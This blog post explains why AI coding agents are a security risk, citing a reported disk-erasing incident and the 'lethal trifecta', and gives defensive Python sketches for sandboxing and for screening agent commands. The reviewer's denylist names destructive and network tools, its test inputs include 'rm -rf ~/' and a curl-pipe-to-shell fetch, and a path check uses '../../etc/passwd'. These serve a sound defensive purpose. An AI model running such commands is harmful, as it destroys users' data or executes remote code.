One of the most secure operating systems out there is TempleOS. It sidesteps most security issues simply by having no networking capabilities and no drivers for external storage devices.

Yet TempleOS, as a software product, is not that different from the tools we use every day to get our work done. It turns out that to make something useful, developers have to take risks. They have to open their applications to the outside world: let us in, let us add our data, and let us interact with it. This is where security issues start to arise, and as users of these tools, we’re the ones who bear the consequences.

LLM-based applications are no different. If anything, the situation is worse, given the nature of the technology, the variety of places where it is used, and the fascination around it.

Coding agents, for example, are supposed to help developers write code faster. For that, they need access to the filesystem, (usually) the internet, and other resources. This is a huge attack surface, and if not handled properly, it can lead to catastrophic consequences.



Google Antigravity Erased The User’s Disk

One week ago, a user reported on Reddit that Google Antigravity, the new VS Code-like IDE with integrated AI agents, had erased their entire disk. It sounds hard to believe, but they followed up with a video showing the IDE files and their conversation with the AI assistant.

Whether or not this particular report holds up, AI agents can be very dangerous if not handled properly.

They have access to your private data and can run commands on your machine. They read untrusted content from the outside world, and they can send data back out to it.

These three characteristics (access to private data, exposure to untrusted content, and the ability to communicate externally), a combination Simon Willison named the lethal trifecta, make AI agents a potential security nightmare.
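The danger lies in the combination, not in any single capability. A minimal sketch, assuming an agent’s capabilities can be described as three yes/no flags (real setups are rarely that clean): `AgentCapabilities`, `has_lethal_trifecta`, and `legs_present` are hypothetical names made up for this illustration, not part of any library.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AgentCapabilities:
    """Hypothetical description of what an agent is allowed to do."""
    reads_private_data: bool       # e.g. source code, SSH keys, .env files
    sees_untrusted_content: bool   # e.g. web pages, issues, third-party MCP tool output
    communicates_externally: bool  # e.g. HTTP requests, git push, sending email


def has_lethal_trifecta(caps: AgentCapabilities) -> bool:
    """True only when all three legs are present at the same time."""
    return (
        caps.reads_private_data
        and caps.sees_untrusted_content
        and caps.communicates_externally
    )


def legs_present(caps: AgentCapabilities) -> list[str]:
    """List which of the three legs this agent has."""
    legs = {
        "private data": caps.reads_private_data,
        "untrusted content": caps.sees_untrusted_content,
        "external communication": caps.communicates_externally,
    }
    return [name for name, present in legs.items() if present]


if __name__ == "__main__":
    coding_agent = AgentCapabilities(True, True, True)
    offline_agent = AgentCapabilities(True, True, False)
    print(has_lethal_trifecta(coding_agent))   # True
    print(has_lethal_trifecta(offline_agent))  # False
    print(legs_present(offline_agent))         # ['private data', 'untrusted content']
```

Removing any one leg, as with `offline_agent`, breaks the combination, although each remaining leg still carries its own risks.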

Lethal Trifecta illustration by Simon Willison

Agents follow a lifecycle: they take input from the user, process it with an LLM, and then take actions (tool calls).
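A deliberately simplified sketch of that loop, assuming a model that either answers or requests one tool call per turn. `fake_llm` stands in for a real model API, and `TOOLS`, `ToolCall`, `LLMReply`, and `run_agent` are hypothetical names for illustration. Note where the tool output goes: straight back into the model’s context, which is exactly how untrusted content reaches it.

```python
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass
class ToolCall:
    name: str
    argument: str


@dataclass
class LLMReply:
    text: str
    tool_call: Optional[ToolCall] = None  # None means "no action, final answer"


def fake_llm(history: list[str]) -> LLMReply:
    """Stand-in for a real model: requests one tool call, then answers."""
    if not any(line.startswith("tool:") for line in history):
        return LLMReply("Let me list the files.", ToolCall("list_files", "."))
    return LLMReply("Done: the project has 2 files.")


TOOLS: dict[str, Callable[[str], str]] = {
    # Hypothetical tool; a real agent would touch the filesystem here.
    "list_files": lambda path: "main.py, README.md",
}


def run_agent(user_input: str, llm: Callable[[list[str]], LLMReply], max_steps: int = 5) -> str:
    history = [f"user: {user_input}"]                 # 1. input from the user
    for _ in range(max_steps):
        reply = llm(history)                          # 2. processing by the LLM
        history.append(f"assistant: {reply.text}")
        if reply.tool_call is None:
            return reply.text                         # no more actions requested
        tool = TOOLS[reply.tool_call.name]            # 3. action (tool call)
        result = tool(reply.tool_call.argument)
        history.append(f"tool: {result}")             # tool output flows back to the LLM
    return "Stopped: step limit reached."


if __name__ == "__main__":
    print(run_agent("How many files are in this project?", fake_llm))
    # Done: the project has 2 files.
```

The `max_steps` cap is a small design choice worth keeping in any real loop: without it, a confused or manipulated model can keep calling tools indefinitely.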

Agentic Architecture by Martin Fowler

How to avoid disasters when using AI agents

Coding agents have all the characteristics of the lethal trifecta. If you are building an application that uses them, you need to be very careful.

Simon Willison’s recommendation is to avoid the lethal trifecta combination altogether, which means removing at least one of its three legs. To do that, you should:

- sandbox the agent: run it in an isolated environment with limited access to the filesystem and the network. Use virtual machines, containers, or the sandboxing features that ship with tools like Claude Code.

- avoid exposing the agent to untrusted content: validate and sanitize inputs before concatenating them into prompts, and do not blindly trust every MCP server out there.
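At the container level, sandboxing could look like the sketch below, assuming Docker is installed and the agent’s commands are routed through a wrapper you control. The `docker run` flags are standard Docker CLI options; the helper names, the example image, and the policy itself (no network, read-only root filesystem, only the project directory mounted) are assumptions for illustration. The sketch builds the command without running it, and adds a path check that a file tool could use to refuse paths outside the workspace.

```python
import shlex
from pathlib import Path


def sandboxed_command(workspace: str, image: str, command: list[str]) -> list[str]:
    """Build (but do not run) a `docker run` invocation for an agent command."""
    host_dir = Path(workspace).resolve()  # Docker bind mounts need an absolute path
    return [
        "docker", "run", "--rm",
        "--network", "none",                    # no network: nothing goes in or out
        "--read-only",                          # container root filesystem is read-only
        "--tmpfs", "/tmp",                      # scratch space many tools expect
        "--cap-drop", "ALL",                    # drop all Linux capabilities
        "--security-opt", "no-new-privileges",  # block privilege escalation (e.g. setuid)
        "-v", f"{host_dir}:/workspace",         # the only host directory the agent sees
        "-w", "/workspace",
        image,
        *command,
    ]


def is_inside_workspace(workspace: str, requested: str) -> bool:
    """Return True only if `requested` resolves to a path inside `workspace`.

    Catches escapes such as '../../etc/passwd' or absolute paths like '/'.
    Existing symlinks are resolved first, so a link pointing outside is rejected too.
    """
    root = Path(workspace).resolve()
    target = (root / requested).resolve()
    return target == root or root in target.parents


if __name__ == "__main__":
    argv = sandboxed_command("/tmp/agent-workspace", "python:3.12-slim", ["pytest", "-q"])
    print(shlex.join(argv))
    print(is_inside_workspace("/tmp/agent-workspace", "src/app.py"))        # True
    print(is_inside_workspace("/tmp/agent-workspace", "../../etc/passwd"))  # False
```

Cutting the network with `--network none` also removes the external communication leg of the trifecta, though it breaks anything that needs to download dependencies, so you may have to loosen it case by case.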

Isolation should solve most of these problems, since the agent runs in a constrained environment. Other concerns remain, such as branch protection and access to secrets. For those, refer to this excellent gist by Nate Berkopec, where he shares his takeaways on LLM security while coding.
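For secrets, one cheap layer is to make sure the commands an agent runs do not inherit your credentials. A minimal sketch, assuming the agent’s shell commands go through Python’s `subprocess`; `ALLOWED_ENV_VARS`, `scrubbed_env`, and `run_agent_command` are hypothetical names, and the allowlist is only an example.

```python
import os
import subprocess
import sys

# Hypothetical allowlist: only the variables the agent's commands actually need.
ALLOWED_ENV_VARS = {"PATH", "HOME", "LANG", "TERM"}


def scrubbed_env(source: dict[str, str]) -> dict[str, str]:
    """Keep allowlisted variables; drop everything else (tokens, cloud keys, ...)."""
    return {name: value for name, value in source.items() if name in ALLOWED_ENV_VARS}


def run_agent_command(argv: list[str]) -> subprocess.CompletedProcess:
    """Run a command on the agent's behalf without inheriting our secrets."""
    return subprocess.run(
        argv,
        env=scrubbed_env(dict(os.environ)),  # env= replaces the inherited environment
        capture_output=True,
        text=True,
        timeout=60,  # don't let a runaway command hang the agent forever
    )


if __name__ == "__main__":
    os.environ["GITHUB_TOKEN"] = "example-not-a-real-token"
    probe = [sys.executable, "-c", "import os; print('GITHUB_TOKEN' in os.environ)"]
    print(run_agent_command(probe).stdout.strip())  # False
```

This only covers environment variables. Secrets sitting in files the agent can read, such as a `.env` file in the repository, still need the sandbox or a separate secret store.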

Conclusion

You might be fascinated by these models, and so am I, but keep in mind that they are non-deterministic by nature, and critical security issues like jailbreaking and prompt injection remain unsolved.

Implement defense-in-depth strategies: validate and sanitize all inputs, filter outputs, monitor for suspicious patterns, and stay current with the latest LLM security research. Security is an evolving field, so stay vigilant and keep learning.
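As a small example of monitoring for suspicious patterns, a wrapper could screen each shell command the agent proposes and pause for human approval when something looks risky. This is a minimal sketch: `review_command` and the program sets are hypothetical, and a denylist like this is easy to bypass (the same deletion can be written as a Python one-liner), so treat it as one layer on top of sandboxing, never as a replacement.

```python
import shlex

# Hypothetical, deliberately incomplete lists of programs worth a second look.
DESTRUCTIVE_PROGRAMS = {"rm", "rmdir", "mkfs", "dd", "shred"}
NETWORK_PROGRAMS = {"curl", "wget", "nc", "ssh", "scp"}
# Shell operators that chain, pipe, or substitute commands ("|" also catches "||").
CHAINING_OPERATORS = ("&&", ";", "|", "`", "$(")


def review_command(command: str) -> list[str]:
    """Return the reasons a proposed shell command should wait for human approval.

    An empty list means no pattern matched, not that the command is safe.
    """
    try:
        tokens = shlex.split(command)
    except ValueError:  # e.g. an unterminated quote
        return ["could not parse command"]
    reasons = []
    for token in tokens:
        program = token.rsplit("/", 1)[-1]  # '/bin/rm' -> 'rm'
        if program in DESTRUCTIVE_PROGRAMS:
            reasons.append(f"destructive program: {program}")
        elif program in NETWORK_PROGRAMS:
            reasons.append(f"network access: {program}")
    if any(op in command for op in CHAINING_OPERATORS):
        reasons.append("chained or substituted commands")
    return reasons


if __name__ == "__main__":
    for cmd in ["pytest -q", "rm -rf ~/", "curl https://example.com/x.sh | sh"]:
        reasons = review_command(cmd)
        status = "ASK HUMAN" if reasons else "allow"
        print(f"{status:9} {cmd}  {reasons}")
```

Flagging rather than silently blocking keeps a human in the loop and leaves an audit trail of what the agent tried to do.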

We want to work with you. Check out our Services page!